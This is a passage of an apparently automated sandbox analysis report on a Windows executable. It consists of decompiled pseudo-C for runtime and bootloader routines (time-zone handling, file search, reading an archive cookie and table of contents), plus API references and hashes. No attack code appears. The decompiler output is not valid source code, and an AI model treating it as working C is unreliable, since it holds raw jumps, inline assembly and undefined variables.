                                                                                                                                                                                                                                                        				 *_t63 = _a24;
                                                                                                                                                                                                                                                        				return _t38;
                                                                                                                                                                                                                                                        			}

















                                                                                                                                                                                                                                                        0x7ff6e5ad509c
                                                                                                                                                                                                                                                        0x7ff6e5ad509c
                                                                                                                                                                                                                                                        0x7ff6e5ad509c
                                                                                                                                                                                                                                                        0x7ff6e5ad50b3
                                                                                                                                                                                                                                                        0x7ff6e5ad50be
                                                                                                                                                                                                                                                        0x7ff6e5ad50c4
                                                                                                                                                                                                                                                        0x7ff6e5ad50c7
                                                                                                                                                                                                                                                        0x7ff6e5ad50d1
                                                                                                                                                                                                                                                        0x7ff6e5ad50e2
                                                                                                                                                                                                                                                        0x7ff6e5ad50f3
                                                                                                                                                                                                                                                        0x7ff6e5ad50f9
                                                                                                                                                                                                                                                        0x7ff6e5ad5100
                                                                                                                                                                                                                                                        0x7ff6e5ad510c
                                                                                                                                                                                                                                                        0x7ff6e5ad5113
                                                                                                                                                                                                                                                        0x7ff6e5ad511c
                                                                                                                                                                                                                                                        0x7ff6e5ad5122
                                                                                                                                                                                                                                                        0x7ff6e5ad5129
                                                                                                                                                                                                                                                        0x7ff6e5ad512c
                                                                                                                                                                                                                                                        0x7ff6e5ad5133
                                                                                                                                                                                                                                                        0x7ff6e5ad513a
                                                                                                                                                                                                                                                        0x7ff6e5ad5140
                                                                                                                                                                                                                                                        0x7ff6e5ad5143
                                                                                                                                                                                                                                                        0x7ff6e5ad514b
                                                                                                                                                                                                                                                        0x7ff6e5ad514e
                                                                                                                                                                                                                                                        0x7ff6e5ad5155
                                                                                                                                                                                                                                                        0x7ff6e5ad5157
                                                                                                                                                                                                                                                        0x7ff6e5ad515f
                                                                                                                                                                                                                                                        0x7ff6e5ad5164
                                                                                                                                                                                                                                                        0x7ff6e5ad5167
                                                                                                                                                                                                                                                        0x7ff6e5ad516b
                                                                                                                                                                                                                                                        0x7ff6e5ad5170
                                                                                                                                                                                                                                                        0x7ff6e5ad517b
                                                                                                                                                                                                                                                        0x7ff6e5ad517e
                                                                                                                                                                                                                                                        0x7ff6e5ad5187
                                                                                                                                                                                                                                                        0x7ff6e5ad518c
                                                                                                                                                                                                                                                        0x7ff6e5ad5199
                                                                                                                                                                                                                                                        0x7ff6e5ad519e
                                                                                                                                                                                                                                                        0x7ff6e5ad51a7
                                                                                                                                                                                                                                                        0x7ff6e5ad51ac
                                                                                                                                                                                                                                                        0x7ff6e5ad51b1
                                                                                                                                                                                                                                                        0x7ff6e5ad51c3
                                                                                                                                                                                                                                                        0x7ff6e5ad51c8
                                                                                                                                                                                                                                                        0x7ff6e5ad51dc
                                                                                                                                                                                                                                                        0x7ff6e5ad51e7
                                                                                                                                                                                                                                                        0x7ff6e5ad51ec
                                                                                                                                                                                                                                                        0x7ff6e5ad51f1
                                                                                                                                                                                                                                                        0x7ff6e5ad51f6
                                                                                                                                                                                                                                                        0x7ff6e5ad51fb
                                                                                                                                                                                                                                                        0x7ff6e5ad5200
                                                                                                                                                                                                                                                        0x7ff6e5ad520e

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6E5AD50CA
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AD4818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E5AD482C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6E5AD50DB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AD47B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E5AD47CC
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6E5AD50EC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AD47E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E5AD47FC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AC9E18: RtlReleasePrivilege.NTDLL(?,?,?,00007FF6E5AD1E42,?,?,?,00007FF6E5AD1E7F,?,?,00000000,00007FF6E5AD2345,?,?,?,00007FF6E5AD2277), ref: 00007FF6E5AC9E2E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AC9E18: GetLastError.KERNEL32(?,?,?,00007FF6E5AD1E42,?,?,?,00007FF6E5AD1E7F,?,?,00000000,00007FF6E5AD2345,?,?,?,00007FF6E5AD2277), ref: 00007FF6E5AC9E38
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6E5AD532C), ref: 00007FF6E5AD5113
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLastPrivilegeReleaseTimeZone
                                                                                                                                                                                                                                                        • String ID: Pacific Daylight Time$Pacific Standard Time
                                                                                                                                                                                                                                                        • API String ID: 1182710636-1154798116
                                                                                                                                                                                                                                                        • Opcode ID: ca4ed7926b596e207be4f80f4b9ad75aba4bf24dc1d6c4a7d1653a48a06c1d64
                                                                                                                                                                                                                                                        • Instruction ID: 9587b035d05433a1f0ea4caf9925723bb93a0ca19b19118f27919a4fb4a41d89
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca4ed7926b596e207be4f80f4b9ad75aba4bf24dc1d6c4a7d1653a48a06c1d64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35518433B1864246E710FF29D8A16A967A0BF48B88F405139EE4DC7695DF3EE8408B49
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                                        • Opcode ID: b154a429360a9d8fc422caeeb97d2d39407f5ca637504bf6a4efef03296319f0
                                                                                                                                                                                                                                                        • Instruction ID: 5b0da48eea76bf2c9b8644758c5e6a6ee6c6e1f517b884c27145d35b92005bf4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b154a429360a9d8fc422caeeb97d2d39407f5ca637504bf6a4efef03296319f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4FF08633B1864586E7A09F68A4547657790BF44B64F440335D96D826D8DF7CD449CB04
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ABB180(intOrPtr* __rax, long long __rbx, void* __r8, long long _a8) {
                                                                                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                                                                        				signed short _t21;
                                                                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                                                                        				intOrPtr _t37;
                                                                                                                                                                                                                                                        				intOrPtr* _t56;
                                                                                                                                                                                                                                                        				intOrPtr* _t57;
                                                                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t58 = __rbx;
                                                                                                                                                                                                                                                        				_t56 = __rax;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABB880(); // executed
                                                                                                                                                                                                                                                        				SetUnhandledExceptionFilter(??);
                                                                                                                                                                                                                                                        				goto 0xe5ac8af4;
                                                                                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_t9 = E00007FF67FF6E5ABB36C(1); // executed
                                                                                                                                                                                                                                                        				if (_t9 == 0) goto 0xe5abb2e8;
                                                                                                                                                                                                                                                        				dil = 0;
                                                                                                                                                                                                                                                        				_v24 = dil;
                                                                                                                                                                                                                                                        				_t10 = E00007FF67FF6E5ABB330();
                                                                                                                                                                                                                                                        				_t37 =  *0xe5afc570; // 0x2
                                                                                                                                                                                                                                                        				if (_t37 == 1) goto 0xe5abb2f3;
                                                                                                                                                                                                                                                        				if (_t37 != 0) goto 0xe5abb224;
                                                                                                                                                                                                                                                        				 *0xe5afc570 = 1;
                                                                                                                                                                                                                                                        				_t11 = E00007FF67FF6E5AC8674(__rbx, 0xe5ada468, 0xe5ada4a8); // executed
                                                                                                                                                                                                                                                        				if (_t11 == 0) goto 0xe5abb205;
                                                                                                                                                                                                                                                        				goto 0xe5abb2dd;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC8630(_t58, 0xe5ada450, 0xe5ada460); // executed
                                                                                                                                                                                                                                                        				 *0xe5afc570 = 2;
                                                                                                                                                                                                                                                        				goto 0xe5abb22c;
                                                                                                                                                                                                                                                        				dil = 1;
                                                                                                                                                                                                                                                        				_v24 = dil;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABB684(E00007FF67FF6E5ABB4DC(_t10, 0xe5ada460));
                                                                                                                                                                                                                                                        				if ( *_t56 == 0) goto 0xe5abb25f;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABB444(_t56, _t56) == 0) goto 0xe5abb25f;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				_t57 =  *_t56;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABB68C( *0xe5ada428(_t70));
                                                                                                                                                                                                                                                        				if ( *_t57 == 0) goto 0xe5abb281;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABB444(_t57, _t57) == 0) goto 0xe5abb281;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC8984( *_t57);
                                                                                                                                                                                                                                                        				_t21 = E00007FF67FF6E5ABB7E8(0xe5ada460);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC85DC();
                                                                                                                                                                                                                                                        				r9d = _t21 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t78 = _t57;
                                                                                                                                                                                                                                                        				_t23 = E00007FF67FF6E5AB1000(_t57); // executed
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABB82C(_t57) == 0) goto 0xe5abb2fd;
                                                                                                                                                                                                                                                        				if (dil != 0) goto 0xe5abb2b7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC8968(0x7ff6e5ab0000, 0xe5ada460, _t57);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABB500(1, 0);
                                                                                                                                                                                                                                                        				_t27 = _t23;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABB82C(_t57) == 0) goto 0xe5abb305;
                                                                                                                                                                                                                                                        				if (_v24 != 0) goto 0xe5abb2db;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC8958(0x7ff6e5ab0000, 0xe5ada460, _t78);
                                                                                                                                                                                                                                                        				return _t27;
                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                        0x7ff6e5abb180
                                                                                                                                                                                                                                                        0x7ff6e5abb180
                                                                                                                                                                                                                                                        0x7ff6e5abb184
                                                                                                                                                                                                                                                        0x7ff6e5abb189
                                                                                                                                                                                                                                                        0x7ff6e5abb194
                                                                                                                                                                                                                                                        0x7ff6e5abb199
                                                                                                                                                                                                                                                        0x7ff6e5abb19a
                                                                                                                                                                                                                                                        0x7ff6e5abb19b
                                                                                                                                                                                                                                                        0x7ff6e5abb19c
                                                                                                                                                                                                                                                        0x7ff6e5abb1ab
                                                                                                                                                                                                                                                        0x7ff6e5abb1b2
                                                                                                                                                                                                                                                        0x7ff6e5abb1b8
                                                                                                                                                                                                                                                        0x7ff6e5abb1bb
                                                                                                                                                                                                                                                        0x7ff6e5abb1c0
                                                                                                                                                                                                                                                        0x7ff6e5abb1c7
                                                                                                                                                                                                                                                        0x7ff6e5abb1d0
                                                                                                                                                                                                                                                        0x7ff6e5abb1d8
                                                                                                                                                                                                                                                        0x7ff6e5abb1da
                                                                                                                                                                                                                                                        0x7ff6e5abb1f2
                                                                                                                                                                                                                                                        0x7ff6e5abb1f9
                                                                                                                                                                                                                                                        0x7ff6e5abb200
                                                                                                                                                                                                                                                        0x7ff6e5abb213
                                                                                                                                                                                                                                                        0x7ff6e5abb218
                                                                                                                                                                                                                                                        0x7ff6e5abb222
                                                                                                                                                                                                                                                        0x7ff6e5abb224
                                                                                                                                                                                                                                                        0x7ff6e5abb227
                                                                                                                                                                                                                                                        0x7ff6e5abb233
                                                                                                                                                                                                                                                        0x7ff6e5abb23f
                                                                                                                                                                                                                                                        0x7ff6e5abb24b
                                                                                                                                                                                                                                                        0x7ff6e5abb24d
                                                                                                                                                                                                                                                        0x7ff6e5abb256
                                                                                                                                                                                                                                                        0x7ff6e5abb25f
                                                                                                                                                                                                                                                        0x7ff6e5abb26b
                                                                                                                                                                                                                                                        0x7ff6e5abb277
                                                                                                                                                                                                                                                        0x7ff6e5abb27c
                                                                                                                                                                                                                                                        0x7ff6e5abb281
                                                                                                                                                                                                                                                        0x7ff6e5abb289
                                                                                                                                                                                                                                                        0x7ff6e5abb28e
                                                                                                                                                                                                                                                        0x7ff6e5abb291
                                                                                                                                                                                                                                                        0x7ff6e5abb29d
                                                                                                                                                                                                                                                        0x7ff6e5abb2ab
                                                                                                                                                                                                                                                        0x7ff6e5abb2b0
                                                                                                                                                                                                                                                        0x7ff6e5abb2b2
                                                                                                                                                                                                                                                        0x7ff6e5abb2bb
                                                                                                                                                                                                                                                        0x7ff6e5abb2c0
                                                                                                                                                                                                                                                        0x7ff6e5abb2cd
                                                                                                                                                                                                                                                        0x7ff6e5abb2d4
                                                                                                                                                                                                                                                        0x7ff6e5abb2d6
                                                                                                                                                                                                                                                        0x7ff6e5abb2e7

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 59578552-0
                                                                                                                                                                                                                                                        • Opcode ID: 1c5000b8b68537155e9ce34116dfc869ca79d5330c0e70c60cc9615d597444d4
                                                                                                                                                                                                                                                        • Instruction ID: 7b11c8352f96131141543a1149fe8374a7bedb94a029f9293428f38707f9608f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c5000b8b68537155e9ce34116dfc869ca79d5330c0e70c60cc9615d597444d4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EDE0BF33F0D10786E65976AD58B22BD14906F44B10F610239E119C93C2CE6E2C92566F
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        C-Code - Quality: 18%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB17B0(long long __rbx, signed long long* __rcx, long long _a16) {
                                                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                                                        				char _v21;
                                                                                                                                                                                                                                                        				unsigned long long _v24;
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                                                                                                        				intOrPtr _t69;
                                                                                                                                                                                                                                                        				signed long long _t84;
                                                                                                                                                                                                                                                        				signed long long _t85;
                                                                                                                                                                                                                                                        				unsigned long long _t86;
                                                                                                                                                                                                                                                        				unsigned long long _t87;
                                                                                                                                                                                                                                                        				intOrPtr* _t90;
                                                                                                                                                                                                                                                        				long long* _t93;
                                                                                                                                                                                                                                                        				void* _t102;
                                                                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                                                                        				char* _t118;
                                                                                                                                                                                                                                                        				void* _t124;
                                                                                                                                                                                                                                                        				unsigned long long _t125;
                                                                                                                                                                                                                                                        				long long _t127;
                                                                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                                                                        				void* _t131;
                                                                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a16 = __rbx;
                                                                                                                                                                                                                                                        				_t84 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t85 = _t84 ^ _t128 - 0x00000030;
                                                                                                                                                                                                                                                        				_v16 = _t85;
                                                                                                                                                                                                                                                        				_t93 = __rcx;
                                                                                                                                                                                                                                                        				if ( *__rcx != 0) goto 0xe5ab17ef;
                                                                                                                                                                                                                                                        				_t3 = _t93 + 0x78; // 0x78
                                                                                                                                                                                                                                                        				_t40 = E00007FF67FF6E5AB3CB0(_t85, _t3, "rb"); // executed
                                                                                                                                                                                                                                                        				 *__rcx = _t85;
                                                                                                                                                                                                                                                        				if (_t85 == 0) goto 0xe5ab1842;
                                                                                                                                                                                                                                                        				_t86 = "MEI"; // 0xe0b0a0b0049454d
                                                                                                                                                                                                                                                        				_v24 = _t86;
                                                                                                                                                                                                                                                        				r8d = 8;
                                                                                                                                                                                                                                                        				_t87 = _t86 >> 0x18;
                                                                                                                                                                                                                                                        				_v21 = _t40 + 0xc;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7200(_t87, __rcx, _t85,  &_v24, _t124, _t131); // executed
                                                                                                                                                                                                                                                        				_t125 = _t87;
                                                                                                                                                                                                                                                        				if (_t87 == 0) goto 0xe5ab1842;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				_t43 = E00007FF67FF6E5ABF934(_t87, _t93,  *_t93, _t125); // executed
                                                                                                                                                                                                                                                        				if (_t43 >= 0) goto 0xe5ab184c;
                                                                                                                                                                                                                                                        				_t118 = "Failed to seek to cookie position!\n";
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB24D0(_t43, _t87, "fseek", _t118, _t131, _t132);
                                                                                                                                                                                                                                                        				goto 0xe5ab19b3;
                                                                                                                                                                                                                                                        				_t8 = _t118 - 0x57; // 0x1, executed
                                                                                                                                                                                                                                                        				r8d = _t8;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABF5FC(_t118, _t131,  *_t93); // executed
                                                                                                                                                                                                                                                        				if (_t87 - 1 >= 0) goto 0xe5ab1884;
                                                                                                                                                                                                                                                        				_t102 = "fread";
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB24D0(_t87 - 1, _t87, _t102, "Failed to read cookie!\n", _t131,  *_t93);
                                                                                                                                                                                                                                                        				goto 0xe5ab19b3;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                                                                        				_t51 =  *((intOrPtr*)(_t93 + 0x34));
                                                                                                                                                                                                                                                        				asm("bswap ecx");
                                                                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                                                                        				_t127 = _t125 - _t102 + 0x58;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t93 + 0x34)) = _t51;
                                                                                                                                                                                                                                                        				 *((long long*)(_t93 + 8)) = _t127;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t93 + 0x507c)) = 0;
                                                                                                                                                                                                                                                        				 *0xe5aedc84 = _t51;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABF934(_t87, _t93,  *_t93, _t127); // executed
                                                                                                                                                                                                                                                        				0xe5ac40b0();
                                                                                                                                                                                                                                                        				 *(_t93 + 0x10) = _t87;
                                                                                                                                                                                                                                                        				if (_t87 != 0) goto 0xe5ab18fe;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB24D0(_t87, _t87, "malloc", "Could not allocate buffer for TOC!\n", _t131,  *_t93);
                                                                                                                                                                                                                                                        				goto 0xe5ab19b3;
                                                                                                                                                                                                                                                        				r8d = 1;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABF5FC( *((intOrPtr*)(_t93 + 0x30)), _t131,  *_t93);
                                                                                                                                                                                                                                                        				if (_t87 - 1 >= 0) goto 0xe5ab1925;
                                                                                                                                                                                                                                                        				goto 0xe5ab186e;
                                                                                                                                                                                                                                                        				 *((long long*)(_t93 + 0x18)) =  *((intOrPtr*)(_t93 + 0x30)) +  *(_t93 + 0x10);
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABF370( *((intOrPtr*)(_t93 + 0x30)) +  *(_t93 + 0x10),  *_t93) == 0) goto 0xe5ab1950;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2770( *((intOrPtr*)(_t93 + 0x30)) +  *(_t93 + 0x10), "Error on file.\n", "Could not read full TOC!\n", _t131,  *_t93);
                                                                                                                                                                                                                                                        				goto 0xe5ab19b3;
                                                                                                                                                                                                                                                        				_t90 =  *(_t93 + 0x10);
                                                                                                                                                                                                                                                        				if (_t90 -  *((intOrPtr*)(_t93 + 0x18)) >= 0) goto 0xe5ab19a1;
                                                                                                                                                                                                                                                        				asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                                        				_t69 =  *_t90;
                                                                                                                                                                                                                                                        				asm("bswap ecx");
                                                                                                                                                                                                                                                        				asm("bswap ecx");
                                                                                                                                                                                                                                                        				asm("bswap ecx");
                                                                                                                                                                                                                                                        				asm("bswap edx");
                                                                                                                                                                                                                                                        				 *_t90 = _t69;
                                                                                                                                                                                                                                                        				_t110 = _t69 + _t90;
                                                                                                                                                                                                                                                        				if (_t110 -  *(_t93 + 0x10) < 0) goto 0xe5ab1995;
                                                                                                                                                                                                                                                        				if (_t110 -  *((intOrPtr*)(_t93 + 0x18)) < 0) goto 0xe5ab1960;
                                                                                                                                                                                                                                                        				goto 0xe5ab19a1;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2770(_t110, "Cannot read Table of Contents.\n", "Could not read full TOC!\n", _t131,  *_t93);
                                                                                                                                                                                                                                                        				if ( *_t93 == 0) goto 0xe5ab19b1; // executed
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABF2AC(_t110, _t93,  *_t93, _t127); // executed
                                                                                                                                                                                                                                                        				 *_t93 = _t127;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(0,  *((intOrPtr*)(_t90 + 0xc)), _v16 ^ _t128 - 0x00000030);
                                                                                                                                                                                                                                                        			}


























                                                                                                                                                                                                                                                        0x7ff6e5ab17b0
                                                                                                                                                                                                                                                        0x7ff6e5ab17ba
                                                                                                                                                                                                                                                        0x7ff6e5ab17c1
                                                                                                                                                                                                                                                        0x7ff6e5ab17c4
                                                                                                                                                                                                                                                        0x7ff6e5ab17c9
                                                                                                                                                                                                                                                        0x7ff6e5ab17d2
                                                                                                                                                                                                                                                        0x7ff6e5ab17d4
                                                                                                                                                                                                                                                        0x7ff6e5ab17df
                                                                                                                                                                                                                                                        0x7ff6e5ab17e4
                                                                                                                                                                                                                                                        0x7ff6e5ab17ed
                                                                                                                                                                                                                                                        0x7ff6e5ab17ef
                                                                                                                                                                                                                                                        0x7ff6e5ab17fb
                                                                                                                                                                                                                                                        0x7ff6e5ab1800
                                                                                                                                                                                                                                                        0x7ff6e5ab1806
                                                                                                                                                                                                                                                        0x7ff6e5ab180c
                                                                                                                                                                                                                                                        0x7ff6e5ab1810
                                                                                                                                                                                                                                                        0x7ff6e5ab1815
                                                                                                                                                                                                                                                        0x7ff6e5ab181b
                                                                                                                                                                                                                                                        0x7ff6e5ab1820
                                                                                                                                                                                                                                                        0x7ff6e5ab1826
                                                                                                                                                                                                                                                        0x7ff6e5ab182d
                                                                                                                                                                                                                                                        0x7ff6e5ab182f
                                                                                                                                                                                                                                                        0x7ff6e5ab183d
                                                                                                                                                                                                                                                        0x7ff6e5ab1847
                                                                                                                                                                                                                                                        0x7ff6e5ab1858
                                                                                                                                                                                                                                                        0x7ff6e5ab1858
                                                                                                                                                                                                                                                        0x7ff6e5ab185c
                                                                                                                                                                                                                                                        0x7ff6e5ab1865
                                                                                                                                                                                                                                                        0x7ff6e5ab186e
                                                                                                                                                                                                                                                        0x7ff6e5ab1875
                                                                                                                                                                                                                                                        0x7ff6e5ab187f
                                                                                                                                                                                                                                                        0x7ff6e5ab1887
                                                                                                                                                                                                                                                        0x7ff6e5ab188d
                                                                                                                                                                                                                                                        0x7ff6e5ab1895
                                                                                                                                                                                                                                                        0x7ff6e5ab189a
                                                                                                                                                                                                                                                        0x7ff6e5ab189d
                                                                                                                                                                                                                                                        0x7ff6e5ab18a7
                                                                                                                                                                                                                                                        0x7ff6e5ab18a9
                                                                                                                                                                                                                                                        0x7ff6e5ab18ad
                                                                                                                                                                                                                                                        0x7ff6e5ab18b0
                                                                                                                                                                                                                                                        0x7ff6e5ab18b6
                                                                                                                                                                                                                                                        0x7ff6e5ab18bc
                                                                                                                                                                                                                                                        0x7ff6e5ab18cc
                                                                                                                                                                                                                                                        0x7ff6e5ab18d5
                                                                                                                                                                                                                                                        0x7ff6e5ab18da
                                                                                                                                                                                                                                                        0x7ff6e5ab18e1
                                                                                                                                                                                                                                                        0x7ff6e5ab18f1
                                                                                                                                                                                                                                                        0x7ff6e5ab18f9
                                                                                                                                                                                                                                                        0x7ff6e5ab1902
                                                                                                                                                                                                                                                        0x7ff6e5ab190e
                                                                                                                                                                                                                                                        0x7ff6e5ab1917
                                                                                                                                                                                                                                                        0x7ff6e5ab1920
